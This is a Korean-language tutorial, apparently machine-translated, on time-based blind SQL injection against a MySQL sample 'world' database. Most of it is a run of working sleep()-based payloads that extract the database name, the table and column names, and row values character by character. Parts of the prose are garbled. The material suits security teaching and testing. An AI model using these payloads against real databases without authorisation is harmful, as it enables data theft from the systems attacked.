시차 기반 SQL 블라인드
2582 단어 네트워크 보안
: MySQL
:world
:city
:ID Name CountryCode District Population
sleep(s)
SQL s
mid(s,n,len)
s n len
length(s)
s
if(expr,v1,v2)
expr , v1; , v2。
substr(s,n,len)
s n len
ascii(s)
ASCII
limit
SELECT
database()
!
저 는 여기 서 id 를 주입 합 니 다. 정상 적 인 SQL 문 구 는 SELECT 입 니 다. * FROM city WHERE ` id ` = (select * from(select sleep(12)union/ select 1)a)
、 ,
(if((length(database())=4),sleep(5),0))
:
5, sleep(5)
sleep(if((mid(database(),1,1)="a"),5,0))
:
a, sleep(5)
sleep(if((ascii(substr(database(),1,1)))=97),5,0))
:
a, sleep(5)
(select sleep(if((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6,5,0)))
(select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='c'),5,0)))
(select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)='i'),5,0)))
(select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1)='t'),5,0)))
(select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1)='y'),5,0)))
(select sleep(if((select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1)=2,5,0)))
(select sleep(if((mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1),1,1)='I'),5,0)))
(select sleep(if((mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1),2,1)='D'),5,0)))
(select sleep(if((select length(ID) from world.city limit 0,1)=1,5,0)))
(select sleep(if((mid((select ID from world.city limit 0,1),1,1)='1'),5,0)))
limit
특별 설명 , , , 。
SQLMap
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
네트워크 보안 시작 정보 수집 (2) Nmap 및 Wireshark침입하기 전에 상대방의 서버 "UP"(살아있나요?)의 상태입니다.기본적으로'핑'이다.최근 몇 년간'피어웰'이 많이 발전한 것 같은데, 솔직히 현실에서는 핑을 여러 번 해도 답을 얻지 못하는 경우가 많다.여기에 사용된...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.